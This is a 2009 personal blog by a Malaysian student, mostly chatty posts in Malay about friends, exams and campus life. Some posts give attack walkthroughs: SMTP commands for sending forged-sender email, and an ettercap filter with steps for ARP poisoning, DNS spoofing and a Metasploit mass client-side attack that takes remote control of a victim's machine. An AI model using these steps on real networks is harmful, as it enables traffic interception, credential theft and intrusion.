YouR GuaRdi4n AnGeL

on Thursday, May 21, 2009
I wish we have 1 more day....
But It just thaT time is finally arrived...
-GooD By3-

I caN't SleeP t0niTe becoZ so SaD..
eVen So i'm JuSt NoboDy tO YoU...

I waNt yOu to knOw that I will be alWays There for You

GooD LucK...&...GooD Bye

JoUrNeY to Ste4mBo47

on Tuesday, May 19, 2009
"ComeLnye Kamu ...Babi...tapi perangai kamu tu kurang sedikit la...kalau tak memng ckop sifat seekor Bab1"

"Oink2...ape Babi..babi..aku ade nme laen kot...lagi best dari name ko...Sus scrofa domesticus"

IkLAN PENAJA ::: kisah diatas tidak kena mengena ngn story yg nk dicite dan tidak mengena jugak samada babi yang idop ataupon yg telah mati disembelih!


td...PiJo call aku ajak steamboat Zolaris sepam ..celebrate dier abes final exam..hak3...jouney yg amat bosan...tapi layan je la...ingt dier nk belanja..last2 sume byar sndiriKILLED

DalaM perJalaNan..kitorng Gi Taman Maju lu..ade mmber bli teket nk tetibe terkuar kesah budak2 yg kne buang pasal terlibat soklan final exam bocor...aku pon baru tau yang start kantoi pasal ade seko manusia bebal mengaku dapat paper final exam kat blog dier...haha..macam mana budak nih lepas masuk UTP pon aku tak tau...kerbau2 yg depan pintu gate tu time malam lagi layak kot...Nasib Malaysia ni ade quota Melayu..Cina...India ..klo X Kerbau pon akan bersaing dgn budak2 seperti nih...

Hasil kajian & interView , Aku mendapati...

"Eh Bang..saya waktu kelas memang manusia..tapi bila bulan mengambang je tuka jadi kerbau..tu abg nmpk byk kerbau dapan UTP time malam je..Hebat x??"

Tapi cite pi cite Mai...alkisahnye Ade budak nme Zahirah yg sgt Cun juga kne dismiss psal mmbeli kertas tersebut...adoi...mkin kurang la asset berharga UTP cmni...ak pon xpernah jumpe ngn Zahirah ni...haish...rugi2...hak3..Photobucket

Kesah Benar mengenai kerbau di depan UTP

Pasal kerbau ni pulak..memang pelik,time malam je ade kat depan utp nih-jadi kami membuat beberape andaian..

1.Kerbau ni mengikot angktan kerbau,ikot kapten kerbau cakap time mlam arahan melepak kt depan gate UTP kne dipatuhi.....

2.Kerbau2 ni juga mungkin kerbau kepunyaan Rector pak guard pon wat dono je tengok kerbau2 nih....xbrani nak kacau...

3.X pon memang tempat ni da disewa reserve utk kerbau2 potong rumput...jimat la cost sket ye la..untuk tenet utp yg sentiasa parah duit potong rumput tuh boleh wat bayar NetworkBox...
dan dapat preruntukan baja free untuk tanaman hydroponic depan rumah Rector

4.Mungkin juga kerbau2 ini jelmaan beberape student UTP seperti yg dicakapkn diatas..

"Muka aku ni xnampak cukop educated & intellect ke?ok kan....walopon muka jer.dalam tu Tuhan je taw..Wink! "

aku gak risau mengenangkn Pijo ngan Geng ni suka masak...Ikan kat tasik tuh orang bagi makan pada waktu petang...tapi malam dia pula smpai untuk menangkap dan mengorengnya...saya doakn nasib yg sama tidak berlaku pada kerbau2 tersebut..

So kat Zolaris ni juga kitorang jumpe couple yg tak Pijo pon ape lagi...start la prasan..
kate Pijo
"EX aku dulu tuh....ak kesian kat budak laki yg muka cam papan tu nk commit suicide pasal xmampu menang rebutan ngan aku...tu aku bagi dia je"

"sp33chLe33"..dalam hatiku walopon jealous jugak...hak3..tapi aku doakn derang bahagia smpai ke rumah-tangga ler yer hendaknyer...jangan dapat rumah je xde tangga...susah plak nanti.

erk..sbe pagi esk kol 9 pagi...kaman last paper final exam...

Bak kata Karam Sigh Walia lagi,
"Jgn pernah Salahkan ibu mengandung..salahkan bapa menjolok serong"

::So Kesimpulannyer...malam nih kisah pasal kerbau yer...bukan babi...WassalaM::

NoboDy KnoWs wHo I'M:Part 2:The HeLL GaTe Just OpeneD

on Monday, May 18, 2009

The truth is..UTP spent God knows how much on Symantec and Novell product. But none of it really works. We always stuck on error every now and then. Bet it,
DNS border manager error, or symantec overloaded is just normal. Either the products are faulty or the admins are dumb.

MoreOver, Our IT department think by reducing student internet usage can help fasten internet...within that they spend a lots of money to accomplish that goal,monitoring for this filter used ...NetworkBox arriveD ....yes,that system really works...but it is even make network become slower...

Guess what?the system only restrict student that qualified to be monitored..and only catch people that deserved to be caught ...what is that mean?..
They only catch idiots...idiots that don't know how to think wise...they catch idiots that don't know how to cover their track..they only catch Script kiddie that claim to be expert hacker!There was a time i heard from script kiddie said

"You know what?last week ITMS came to my house and check our connection usage..oh no...we are near to be caught",

somebody said that proudly.I just smile and walk a way,deep in my heart...
"This dumbass proud to be detected ..i wish him good luck.. -sigh-"

The problem is..IT department overlook the situation...they can get better or bigger internet bandwidth if they spend those money in right way...and use correct open source product for their internet management,which required self-setting...but then...none of them are capable doing they decide to waste money for something that they can get equally for free/lower price...their egoistic also too strong...which kills the needs for asking IT expert students.

Back to the track...i start asking in forum...searching for solutions ...the first question as far as i remember is this on
1. Use Tor
2.Here's the idea: Different protocols handle data in different ways, but you can generally manage to transport the data for one protocol over another. (For example, an SSH session can be transported over HTTPS.) This is what I call protocol tunneling -- I don't think that's the actual name. If you set up a tunnel between your computer and an off-campus friend's computer, using a protocol that only transmits data in small chunks. I don't know enough about the various protocols and tools to know how one would construct this system, but it is definitely within the range of possibility.

From answer replied...i know there are 2 ways to solve my problem..first is of course using Tor. At that time there are only few people from my University know how to use the download speed is not really bad.Meanwhile...i also struggle how to speed it up i learned a lots from elite proxy, elite proxy switcher ,OpenDns, Local DNS cache..etc...

After a while,my interest change to second option..but i'm sorry i can't write anything relating second option because it is illegal , & can lead to academic dismissaL least in my universityYOU

Own Research K!!

At first i really wish to introduce linux to my folks..i start asking around...up flayers promoting linux....sadly it turns out just few people interest with it...because many students think linux is sooooo complicated...all they want is short cut!

so i decided to move on my learning..

Then..I also wonder about hacking..what it really is..and how i'm able to be one...where can i found article or somebody to teach me? i found Nubuntu,and did explore few network software..but then it seems already arrived at the end of semester...

2o07-New Sem, New year.. 19th of February 2007, 16:21 GMT - ProtecH released...This awesome distribution really help me a lots exploring networking world..especially i'm able to compare with previous analysis related tor and tunnel...few weeks later..i become one of the moderator in protech forum.It really boost me up to explore networking in deep....Thank You P1nT4S !

Sadly...Protech main developers seems disappeared for sudden and next version hang in the middle...

few months later...Backtrack start become popular hacking distribution...many hacking video demonstrated using backtrack i decided to give a try ..

(To Be ConTiNuEd) (Last ChaPteR)

Turn Back The p3nDuLuM

on Sunday, May 17, 2009
If tHeRe WaS t1m3 i saY "HI"
N0W is the timE i Say "Bye"

Sob..sob...xdpt menahan kesedihan...hurm..lg bape ari da nk tinggalkn tmpt ble kte nk kuar ni...kte asyik terkenangkn time msuk...sme la..ble rse nk mati...mesti kenangnkn time kecik3...

so ak xle recall korang sume...kang float blog ak recall la sesape yg rse terpikir skrng...

CarriCk - Micheal Carrick London

hak3...dlu dier gne nick carrick..pastu tuka kt gtalk tambah london tu..ak xtaw psal siapa Carrick nih? dier ni hardworking student giler....roomate dier Hilary gi sport ke ,jenjalan ke...dier msti study...

ResPect! TEAR
first conversation gtlak yg best! Tuesday , 22 May 2007
(02:25:03) weh
(02:25:07) sape nih...?
(02:25:15) BORING
(02:25:23) wey
(02:25:28) aku la
(02:25:41) jungle killler
(02:25:44) wolf
(02:25:52) ko ade nama x?
(02:25:58) hihihihih
(02:26:09) nama yg diberi oleh ibubapa ko?
(02:26:13) ak apis la
(02:26:15) hahah
(02:26:15) ceh
(02:26:20) haha
(02:26:24) nak drop la tu
(02:26:28) weh
(02:26:29) apis carrick
(02:26:39) apis....
(02:26:48) aku ade 118 kwn nama apis
(02:26:56) ceh
(02:27:02) yg mne ek?
(02:27:09) ceh
(02:27:11) lupe kwn
(02:27:12) ak la
(02:27:18) apis from london
(02:27:21) carrick

Hilary nih memang sgt ske sport...mmg sangt susah nk jumpe dier kt blik waktu riadah...kenangn yg ak ingt time kayak la...kayak ak pancit xmmpu nk troskn..dier ganti dak girl yg naek kayak ngn ak jd laju la...and time jungle kitrng sgt sesat dlm utan...Hilary lah cari jlan kuar time tu tah cmne...

Oldest conversation
me: hellocan i know who is this?me: wehade bilik kosong lain x?hah?kat v3?Hilary: ntah..ko dmna skrg?me: ....kat v1 a....Hilary: ko blum cek lagi ka?me: ari tu xde org....kat bilik tuh....Hilary: nnt ko pgi tnya kt v3 cafe utk check.HAPPYRUN

NasRol -YEAH
Kawan Civil ak dlu..rapat gile smpai skrng...entah la knape..ape yg best pasal dier ni..dier msti nk argue sume bende yg ak cakap..tu yg menarik tuh..dan dier ni msti asyik pikir sesuatu bende ke tahap sgat complex...yang mungkin tak dpat difahami manusia biasa...hak3 ..pastu ade je dier tacap petua itu ini..WISHTLESALIVAL . yang bagusnya dia ni..slalu nasihat ak yg slalu leka nih...SMOKE

oldest conversation
mohamad: assalamualaikum
me: wsalammohamad: jom joggingme: Xmo3mohamad: jom dota
de berani ke?NIACAme: ...


Ni member study last minit ak...time dekat test n final exam mmg struggle sesame..walopon sblom ni xrapat sgat..tapi ikatan exam & test mengubahnya~~BLUSHING2 .Sbab ade dier ni gak ak slalu gi masjid..klo x jumpe time jumaat jer la JILT

So mungkin ak tambh lg je terdetik di benak fikiran skrng....
::Happy Intern!Wish me Luck K::

Why there are DumbAss everywhere Around the World ??

on Saturday, May 16, 2009
Dear folks,

Click HERE to get Bill Gates Money!!

Enough of this Kind chain mail
...I'm TiReD with all of this....

i don't care if you guys going to block me after this....but what you guys have done is not only showing you are not qualified to be educated people but even not qualified to live as people that have brain to think....especially if you are an IT student...

It is a shame...that i keep receiving hoax email, saying that if you forward this email , you will get bla..bla...bla....or even will donate something within sending an email....It start will my friendster inbox full with this kind of forward message ... i never care about that..BUT right start attacking my mail inbox...i don't want to mark you guys as spam...i know there are and there will be other important email from you guys...

Readers...please think wisely..before send any message...if you still want to send that kind of message...think again and again and again!till you decide not to do so!

First of all... even google itself doesn't gain any profit from creating email!!!Its money come from ads and promoting.. what the hell in your mind that you think by forwarding an email will get money..if that chain mail come from 5 years old kids..i still can accept..

I know...what are in your probably think -->

1.Ok , I concern to donate ..i don't have money

yes, very kind of you...but you miss the is good you have concern ... but it still bad that you don't have a brain to think whether it is logic or not...or you don't even care to check is it true or not..atleast by using

please consider to do other good things...

2.Ok, I just want to try..who knows i really get the money/something

There is no such thing as free give..."easily to be rich is to teach people how to be rich" .. it is not even logic somebody want to give you money just by doing forwarding email... don't waste your time on doing this..

3.Ok, just do won't hurt anyways or waste anything

NOOO,IT DID...IT DID HURT...IT HURT YOUR PRIDE...YOUR BRAIN..and the most important is IT HURT MY EYES TO SEE IT TOO!!!! WASTE TIME for you forwarding rubbish and for receiver time to delete it....and IT WASTE RECEIVER INBOX SPACE!! have you ever learn security? you know ssl?..sha-1? certificate?...etc?? No?it is ok..i'm simplify it here..all data are really private...except to the mail company itself...but even so, google itself faces a lots of problems before this regarding analyzing email traffic,many companies ban google because of that ..and that is just traffic...not spreading around your email information!!

Knowing now that it really doesn't work..please don't ever again send that kind of chain mail..if other dumbass received it,they might continue to forward it...for some people maybe they will just ignore it...but there are people who really pissing off looking at this kind of email(It just happen i am one of them!)...especially if that email from educated person!

common guys...
i know you are better than this...

::No hard feeling ya..those all cruel and harsh words for your own good :P ::

NoboDy KnoWs wHo I'M:Part 1: the Begining of Do0msday

on Friday, May 15, 2009
-So0RY , I'm jus7 no7 7h47 9o0D-

I'm born as normal person...i dont have any good looking attraction ..i'm not kind person who shine as genius.. i'm not even feeling i'm needed in this community ..all about me is just so in this so called sophisticated place makes me sometime wonder...what's the purpose i'm here ..does my existence even make difference to my surrounding ?....everything such a mess... but there is one thing for road was covered with blood and tears. I'm not born with everything-ready-to-learn ,everything that i have now...was all from tremendous pain and sacrifices ...maybe all start from this -----)

I'm taking Information , Communication and Technology this engineering technology university .... most of engineering students see us as nobody ...and not even worth to exist compare to their engineering knowledge complexity... why is this happening...?we are here what we are i need to remind you guys that we entered this university equally qualified ?why do you guys need to isolate us ? why ? why ? why?

i'm once think about this ..and at foundation , i did mentioned it to one of my IT expert senior...He smile and said to me

"Do you want want to learn what so called truth about your course in real life? OR all you want to spend here is forcing yourselves remembering notes,book and score ? "

i said...

"is it possible to go for both?"

"Nope...choices exist to be choose...and it is up to you to decide it"

"I think i'm prefer the first option"

"Then you need to be ready to walk to the hell with me"

what on earth is that suppose to mean ?did he ask me to commit suicide with him ?..i wonder....but then it just turn out it is even worse than that... It start with he introduced Linux to everything about linux is so much pain...atleast for me to struggle alone...because after he teach me the basics...he ignore me and whenever i ask him , all he said was

"Go explore by yourselves"

I really hate that words..i'm not just linux newbie at that time...i also don't have any other alternative source to learn except from him...i don't care what perception that he thinks at that time about me...the only thing i do care the fact that i can't care anything at all,as long as i gain the knowledge..then after i keep continue asking newbie questions to him...he then said

"It is not to late now to stop...all you need to do is just to delete everything i ever said to you from your memory..and go back to your real life"

i'm speechless ... i'm hopeless .... but atlease it make me realized that i need to depend everything on my shoulder..and no matter what...i'm not kind of person that easily give up ...

At that time , the download limit is IT department not just dumbass but also cruel and never think of behalf of student...what on earth can we use internet for if 2Mb is limit...even sometime lecture notes are bigger than that (PDF)....? i complained not because i want to download movie or what...but it is just that such a pain for me to update linux software..because most of it ofcourse bigger than 2mb....alteast no matter how brainless and heartless you are...set the limit to 10mb...even 8mb is still ok... but 2mb ???what's hell kind of internet in TecHnoLoGy university is that???

all i did to counter this situation was after i finished my foundation class...i went to library software ...and it just seems like kind of duty going there everyday...and it happen to be i did it everyday ...

UNTILL ... i realized that...if i continue like this...i'm not only showing that i'm same such dumass and moron like them...but i'm giving up on learning to improve i figure it out why don't i explore about network....maybe it can help me somehow...atleast help to upgrade my linux software that obviously more than 2mb at my room...

(To Be ConTiNued)

H4ckin9 4 l1f3 ~~

Baru2 nih...ade bape dak Universiti ak ...kantoi wt ape tah...pasal network...kesannye...kne Kick /dismissal ...walopon dak2 tuh...ade yg final year final semester ...iaitu..xsampai pon sebulan lagi untuk graduate.....antara ura2 yg ak dengar....

1. Derang men tunnel...village ke village...speed up network...steal bandwidth...etc...
2.Derang cilok paper final exam....pastu ak x confirm...yg ak taw..akak IRC pon kecoh2 bende kemungkinan besar la bende nih btol...

Pasal cilok paper nih... bende ni mmg wujud kt university nih....even sblom ak msk university nih no doubt klo korang tertnya- tnya , bole ke tak bende ni berlaku...tapi aku rasa yg sesiapa yang cilok paper exam ni(tahun2 sebelum nih pon) tak lah tidak bijak...ataupon xpercaya lansung ngn diri bole wat final exam...pasal derang da lepas SPM dengan cemerlangnya ( Da kat University kn.. haaa..itu yg kita xtaw) ,so wat pe nk cilok2 lagi? ...ak juga rase derang ni xde la pokai sangat and nk cari duit makan ngn jual paper nih..

apa yg ak rase...sume nih...lebih kepada challenge ... and knowledge..tapi ak masih lagi rase itu sumua bukan alasan yang baik untuk wat bende tuh. . .tapi jangan lah semata2 wat benda ni untuk kasi orang tahu yang anda mampu buatnya... pasal hacking nih....bnyk dak University ak expert..... tapi it is up to invidual...whether to use it for good reason or via-versa...

haaa...itu sume intro je tak? (hak3 ...perasan sendiri!!)..topik yg ak nk cakap ari nih...pasal... kat dunia ni memang camtu...wujud bende bertentangan untuk ape2 pon...

so Sebab tu lah polis itu wujud...pasal orang jahat ada lah polis wujud... member aku cakap..polis tu wujud pasal nak menjaga keamanan ..bukan sebab orang jahat wujud...memang la...keadaan tak aman tu...disebabkan sifat jahat itu wujud lah...cukup lah jika undang2 saja wujud..dan tidak ada polis..di dalam setiap manusia...yang korng perlu ingat.... tiga benda yang akan membuatkan insan bergelar manusia nih patuh akan sesuatu

1. Perasaan Takut
2.Ganjaran terhadap sesuatu
3.Perasaan Hormat

Perasaan takut..kalau tiada hukuman terhadap larangan...lebih banyak jenayah akan berlaku...sama lah orang takut membuat sesuatu kejahatan pasal sedar akan dibalas kelak .

Ganjaran...setiap benda kita mahukan ganjaran...untuk menjadi sebab kita berusaha kearah nya...tapi jangan lah sampai terlibat dengan penipuan...

Hormat...adalah satu benda yang sangt unik ... kerana dengan menghormati Allah ataupon seseorang lain...manusia tidak akan menghindari kejahatan tanpa sebab takut akan dosa/punishment ... atapon sebabkan inginkan ganjaran..hanya lak semata-mate kerana hormat...dan bersyukur akan nikmat yg ada disekeliling ...mampu kah kita mencapai tahap ini?

bak kata Karam Sigh Walia.

::..tepuk dada tanya selera, tepuk perut. .tnyalah nasi dah masak ke belum::

you want to screw my MyBank2U??..WTF..hak3..

on Monday, May 11, 2009

First of all...i don't even have myBank account...hak3...this email really such funny..

Lets he/she's screwing people around....

First of all....we want to this a$$H0(3 do send an email using fake email address isn't difficult...there are plenty ways though...easiest is just by doing

Form MAsterGuru Post -->
> telnet 25

Telnet is the application we are going to use but in this case we are connecting to port 25 and not to the normal telnet port of 23. Port 25 is used for SMTP or the protocol used for email. You should get the following response back if you are connecting to an exchange server. 220 Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at Tue, 19 Feb 2005 14:44:12 -0500 Now you should type the following

> helo

The server should respond that helo back. Next type in the following:

> mail from:

This tells the server that you want to send email from the bosses account. Next type:

> rcpt to:

This is your friends email address. And next type:

> data

This sets the system to get ready for you to begin writing your message. Now start typing what you want to say:

> Friend, I am tired of your constant watching of penny arcade video’s and now you are fired.

Once you are done writing your message hit enter, then type a period “.” And then hit enter again. It will store and then save your message sending it to your friend. Now that is what I call funny!

This person also make stupid spelling errors ,where we can easily detect it. Noted that the address also difference with the link given

For is easy to just need to googling around for html howto ..and learn it...or just use webdevelopment tools such as...dreamweaver ...

To save his/her ass... might hosting the website using ghost pc (Botnet) or spoof his/her ip address...

How to defend ?

how eh ?? i also don't know...hahaha ..just don't be such dumAss and moron... if you recieved email such as this..or even phone call...make sure to call the real company mention and confirm about it first....Remember... there is no such thing as free give....atleast in this world....

..I wish U kno3 h0w mucH i Miss u...

on Friday, May 8, 2009

I'm Might noT b3 r1gHt gUy that aBle To suIT U...

TheRe Is AlwaYs SomethinG i WanT to TeLL U...

TheRe is AlwaYs OneThing That I really Scare Of


ThaT I LoV3 You~~

This is a mathematical challenge , and it's been said that:

on Thursday, May 7, 2009
If you're an engineer, you should be able to solve it in (under) three minutes (more like 30 seconds) ,
if you're an architect, in three hours;
if you're a doctor, in six hours;
if you're an accountant, in three months
and if you're a lawyer, probably never.

if you're good at math or logical problems, solve this challenge and the answer is the password to open the spreadsheet to which you can add your name to the hall of fame.
What is the missing number in this logical series?

1, 2, 6, 42, 1806, ____???

The answer is the password to open the spreadsheet that is attached to this post . If you figure it out, open the spreadsheet, type your name in, save it and resend it to your friends.
Good luck


3 more DaYs Before Final~~

"Nak tido dalam blik aku kne tolong aku kemas bilik ...kAlo tak tido kt luar la ko nanti"

" Oi Si TompoK , Tak Kan Makan je tau...dah la tak reti masak...basuh pinggan2 tuh....klo tak...ko la lauk petang nih"

DNS Spoofing- The Basics to advances

on Wednesday, May 6, 2009
I Did a lots of research for my tiny network security project group regarding this topic..while other groups just present the basic security ...So here...we start from the basic

First you need to know what is DNS . I try to narrow the scope...DNS spoofing is kind of modification attack , where we steal the packet/s transmit and change it according to what we want.IF you googling around ,you will found that the basic of dns spoofing can be easily obtained/practice using ettercap . You should able to grap the basic using this howto .

If you install the ettercap , it only provides the basic of 'man in the middle' stuffs . For advance usage ,try to play around with filter ...example given here

filter -->
if (ip.proto == TCP && tcp.dst == 80) {
if (search(, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");

if (ip.proto == TCP && tcp.src == 80) {
msg("in Second IF\n");
if (search(, "Hello")){
replace("Hello", "12345");

if (search(, "Google")){
replace("Google", "GOOGLE HACKED");



now where were we...ok..You can play around ettercap with wireshack really fun because while you a poisoning a specific machine are able to read the message or any kind of text he post to the network by using wireshack(example : text that i'm writing here..LOL) apply to private data such as username and password too...even the basic ettercap able to capture email private data ... the most popular testing email use is gmail,don't really sure why though .....other tools that you might be interest are

nslookup -look for ip specific website

Note that you can get more data if you run nslookup with specific ip

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup

Non-authoritative answer:

[ reez @ alexendeRReez : /home/reez/Desktop ] nslookup

Non-authoritative answer: name =

Authoritative answers can be found from: nameserver = nameserver = nameserver =

- Network scanner

This sometimes might be just simple vanurable scanner ...but at the same really dangerous ...there are a many option provided

[ reez @ alexendeRReez : /home/reez/Desktop ] nmap -help
Nmap 4.68 ( )
Usage: nmap [Scan Type(s)] [Options] {target specification}
Can pass hostnames, IP addresses, networks, etc.
Ex:,,; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO [protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sO: IP protocol scan
-b : FTP bounce scan
--traceroute: Trace hop path to each host
--reason: Display the reason a port is in a particular state
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
Options which take


enough with the craps...ok..lets i apply in real situation (my tiny network security project)

1. Open Ettercap
#ettercap -G
2. Go to option = Sniff -> Unified sniffing
3. Scan for host to get lists of LAN connections in LAN using option = Hosts -> Scan for hosts
4. Set the target; usually choose one IP as victim IP, and its DNS server example
Victim’s IP:
Server’s IP:
5. We launch the MiTM attacks which is ARP (Address Resolution Protocol) poisoning.
6. Then, check difference packet capture in victim computer using Wireshark before launching the
MiTM attack and when it is still occurring.
7. i) Edit file, usually name: /usr/local/share/ettercap/etter.dns
ii) Point the target URL to our IP address (intend to spoof but as we are demonstrating Mass Client
Side Attack , we point the URL to the Attacker IP address).
Example: A
iii) Close and save the text file.
In Ettercap GUI(Graphical User Interface)tools, check the available plugins by clicking DNS
spoofing or by using command line
Ettercap –T –q –M arp:remote –P dns_spoof //

8. Check the IP address using Nslookup again and it will give difference output compare to the initial
Nslookup test before starting MiTM attack in the previous steps (Cmd/windows terminal
) as it should point to the Attacker IP address.
9. It is mean whenever victim open browser to browse, it will redirect to the Attacker IP
10. Open the FastTrack application which is listed under Penetration in the BackTrack Operating
11. At the Shell FastTrack Main Menu, choose the number 2 option for: External Hacking. Then, you
must select number 7 option for: Metaspoit Mass Client-Side Attack.
12. Check the IP address using ipconfig(windows) or ifconfig(Linux)
13. Next thing to do is entering IP address for Apache and press the enter button.
14. When the victim browse, it will redirect victim to Attacker IP address (9) and the
attacker starts to attack.
15. We have to wait until the Framework connects to the system. After that, we are able to remote
victim desktop and modified anything as we wish.

I Will explain about Framework in other see you in next post...You might want to googling around for other example...


InteRn oh InTeRn ~~ -Standard status skng kt Gtalk

on Monday, May 4, 2009
pagi nih...ade talk pasal merunsingkn ak lagi..pasal ak xdecide lg...tmbh la cuak ble adhwa ckp siip men sket ati decide accept tok spe yg da dpt offer b4 17.4....dan ak antarany yg dpt tp...xconfirm lg...

lagi merunsingkn ble ade 1 company ckp hrp ak dtg...sedgkn ak da decide nk gi intern tmpt len...sgt serabut..klo ak dduk kt Klang...mungkin sep sket..sbb bill rumah & makan xkne byr...ble gne KTM/LRT ke mne ble nasrol ckp

"klo ko gne sehari tiket KTM rm10 je pon,sebulan da kat rm300"

ak serabut balik....entah la...Klo ak dduk umah mkcik ak kt Klang tu..ak kne layan karenah anak2 nya yg buas lebih dari seekor kucing yg termkn cabai..ikotkn ati time parent dier xde...dak2 nih..ak sembelih wat goreng je..xpon ak kunci lam sangkar ngn tikus derang(hamster)..tapi apekan daya hasrat itu hanya berkubur dihati saje...

ari ni ari ke-2 study xstudy2 lg...riso pon ade jugak...cuak tu nafsu main tu mengatasi segala-galanye..hak3...ok2..study2

::All the best tok yg Pergi Intern & final exam::

-7h3 l3g3nd4ry p3ndragon , feYnt & SoSo-

on Saturday, May 2, 2009
Sem lps klo sesape maen Dota kt V4 xtau nick2 ni...mmg xtau nk ckp ape...keTegaRan & ketererran 3 player ni mmg xdpt dinafikn....dgn standrdnye mmg sentiase mng...

p3ndragon : Hunter & Killer,tunggak utama biasenye...
feYnt : Based hero,hunt or farm...
SoSo : Farm till strong....

kte mule ngn SoSo..dier ni..wktu tido start kol 8pagi hingga 4 ptg...waktu mlm dia brjga menahan tidonye utk melayan movie,anime,hentai etc...mmg dia ni xnah tido mlm..ak pon pelik tgk dier nih...klo dier replace hobinye lyn movie nih ngn keje pak guard shift mlm pon lg bgos...dpt la juga duit...ataupon keje ngn Batman ke..Kelas tu aram la pegi..bende yg pling ak menYampAh ngn dier ni adaLah dier isap Rokok selmbe je lam blik time ak ade...ak sensitive gile rokok2 nih...klo korng nk mmpos cpt pon xya la racun org sekali..yg Baeknye dier ni slalu gk nasihat ak 7 sro ak study..walopon time dier ngh men nk dijadikn exam dier gi 1 paper je..tu pon dduk 1 jam...pastu balik blik n ckp

" mati final exaM,sem depan ak da kuar UTP"

dan sambung maen dota sehingga akhir final exam..yg celakenye dak ni akhir sem dier cilok hp ak sblom blik...ak gk sdr time tu byk lg bnde laen yg dier cilok...DaMn!!!

p3ndragon ni baek sgt2 asyk berang xtntu psl...klo tgh men dota ngn dier ade je budak kne pelempang ke penypak ke..dier siap wt free delivery penyepak ke blik lg..misteri dier ni mmg mengalahkn misteri nusantara..mengalahkn misteri hantu2 seekers lagi...psl kelibat dier ni nmpk time awl sem je...akhir sem mmg dier xkn bole dijumpai di UTP..entah la knape...yg bgosnye dier ni ..dier slalu gile la bg ak pinjam duit..hak3 ..pastu ade plak budak girl UTP tergile-gilekn dier..hak3..yg ak menyampah sgt dier salu kecoh yg dier sgt hebt Dota...& slalu ckp ble gi cafe sume awek Cun asyik usya dier je..tu yg xle blah..hak3

feYnt..iaitu diriku sndiri...entah la ak mcm ak pkir ak ni byk masalah sjk msk umah ni..mungkin terpengaruh ngn game2 nih...ak abaikan everything..dan mungkin ble dak2 td da kuar utp ..ak pon agk kosong psl xde mmber...entah la..ak pon cbe stop men game mmg asyik gagal...ak pon riso gk exam bakal

::better i stop now...if it continue like this..i'm really gonna be dead meat::

aw3kz....ap3k4h p3ntin9nY3?

on Friday, May 1, 2009
HARI NI,1 MAY, time ptg...ak gi block i singgah ler kt kedai mesra, pocket D..pastu ade nmpk awek yg slalu jg kdai tu imagine keadaan yg sgt sunyi..sbb ari tu ari cut pekerja..kre ak ngn dia je kt kdai tu..n xde sespe kt luar tuh...fuh3...

pastu..time ak gi kuar duit...tetibe ak toleh blkng...xde lak awek tuh..ak pon mule rse cuak sket...ak srg ke ke block nih..rse cm mimpi lak...time ak nk blah tuh..tetibe dgr suaran telipon...awek td ngh ckp ngn balak dier..punye la emo..ak tgk kt kaunter xde sape pon..rupe2 nye ade 2 org awek piawai keje kt c2...drg tgh melepk baring kt lantai,ade karpet la..n srg ngh ckp telepon...

kesimpulannye...erm..ape yer...tah ler...klo keje tu, keje tol2...xkn nk mkn gaji buta kot...haish..ingt gk ak time lecturer ak marah dulu sbb geng2 ak slalu ponteng class... ape dier ckp?

"I'm here because i got pay to teach you....and are paid to just attend the that so difficult?"

lecturer tu berang psl ade ler dak ckp(dgn nada xbersalah)...2 jam klas lme kitrng rse dtg utk 1 jam terakhir da ckop..iskh2 ,budak2 akhir zaman..xle kate ape..hak3

Argh...ape yg ak merapu nih..xmsk topic lg...intro pnjng sgt nih..sbnrnye ari nih..ak nk ckp psl awek..sebenrnye...kdng2..ak pon sokong jugk la..bile dak2 Masjid ni ckp

"Couple tu HARAM"

bukan kisah dr mmber ak yg face sndiri...setiap manusia nih...ade nafsu.....sumber nk wt jahat ni..ble kte rse ble ko rapat ngn ssrng awek..smpai 1 tahap ko akn rse ko sgt kamcing ngn dier...n dia just allows je ape ko nk ko akn mkin berani...mule2 mungkin start ngn gurauan...nk cover nafsu la katekn..pstu...erm..

bagi ak...i couldn't agree more..(hak3..ayat piawai PCS)..TETAPI ..dr segi ape yg ak nmpk la..ade gk la couple yg sgt berjya...derng sudy sesame...lwn drng sgt cemerlang...lecturer wireless technology ak pon ckp dier cmtu lastly bg depends...seriously based on individual..

aku?...entah la...ak ni ske dduk sensrng....mungkin jnis ak jujurnye ak ade la baek2 ngn sesape kt gtalk la....mungkin sbb nervous sgt ble ak kt klass..nk ckp ngn girl manepon...dan kt Gtalk tuh..ak xchat specific eh.. bukan sorng eh....

ak teknkn point tu psl ade awek perasan ak tergila-gilakn dia,slalu gtalk dier sorg la cam stalker gile la ak ni..

...1'm tH3 l393nD4rY n19h7 s74(KeR...

.sbnrnya hkiktnya time ak boring aram...ak chat je sesape,awek ke,mmber itu ak xkesah sgt..yg ak kesahnya...ade ke dier kecoh kt org psl bnde tuh.....sedey siot..siyes....sebab

"KaLauLah SaYa ni JaHat ManePon...SaYa ni ManuSia JuGa...Punyai Hati & peRasaaN...dan MaruaH"

